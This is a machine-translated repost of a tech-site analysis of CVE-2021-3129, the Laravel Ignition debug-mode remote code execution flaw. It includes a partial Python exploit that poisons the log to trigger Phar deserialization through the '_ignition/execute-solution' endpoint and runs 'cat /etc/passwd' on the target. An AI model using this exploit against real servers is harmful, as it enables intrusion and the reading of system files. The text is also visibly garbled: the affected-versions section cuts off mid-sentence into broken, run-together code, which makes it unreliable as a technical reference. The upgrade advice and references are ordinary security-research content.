Shulou(Shulou.com)05/31 Report--

Editor to share with you the Laravel Debug mode remote code execution vulnerability CVE-2021-3129 example analysis, I believe that most people do not know much about it, so share this article for your reference, I hope you will learn a lot after reading this article, let's go to know it!

CVE-2021-3129-Laravel Debug mode remote code execution vulnerability

I. brief introduction of loopholes

Laravel is a concise, open source PHP Web development framework designed to implement the MVC architecture of Web software.

When Debug mode is enabled in Laravel, due to the unsafe use of file_get_contents () and file_put_contents () functions by Ignition components included in Laravel, attackers can trigger Phar deserialization by initiating malicious requests and constructing malicious Log files, resulting in remote code execution.

Second, influence the version

Laravel = 0: return text [echo _ find + self.__delimiter_len + 1: text.find (self.__delimiter, echo_find + 1)] else: return "[-] RCE echo is not found." Def exp (self): for gadget_chain in self.__gadget_chains.keys (): print ("[*] Try to use% s for exploitation."% (gadget_chain)) self.__clear_log () self.__clear_log () self.__payload_send ('a' * 2) self.__payload_ Send (self.__gen_payload (gadget_chain)) self.__decode_log () print ("[*] Result:") print (self.__rce ()) def _ _ init__ (self Target, command): self.target = target self.__url = req.compat.urljoin (target "_ ignition/execute-solution") self.__command = self.__command_handler (command) if not self.__vul_check (): print ("[-] [% s] is seems not vulnerable."% (self.target)) print ("[*] You can also call obj.exp () to force an attack.") Else: self.exp () def main (): Exp ("http://127.0.0.1:8888"," cat / etc/passwd ") if _ _ name__ ='_ _ main__': main ()

IV. Safety recommendations

It is recommended that you upgrade the Laravel framework to version 8.4.3 or above, or upgrade the Ignition components to version 2.5.2 or later.

Download link:

Https://laravel.com/docs/8.x#laravel-the-fullstack-framework

Reference:

Https://mp.weixin.qq.com/s/ShRvF_YeV9JbJJnOUjklCw

Https://github.com/SNCKER/CVE-2021-3129

Https://www.venustech.com.cn/new_type/aqtg/20210114/22299.html

Disclaimer: this site provides security tools, procedures (methods) that may be offensive, only for safety research and teaching, at your own risk!

The above is all the contents of the article "sample Analysis of Laravel Debug mode remote Code execution vulnerability CVE-2021-3129". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.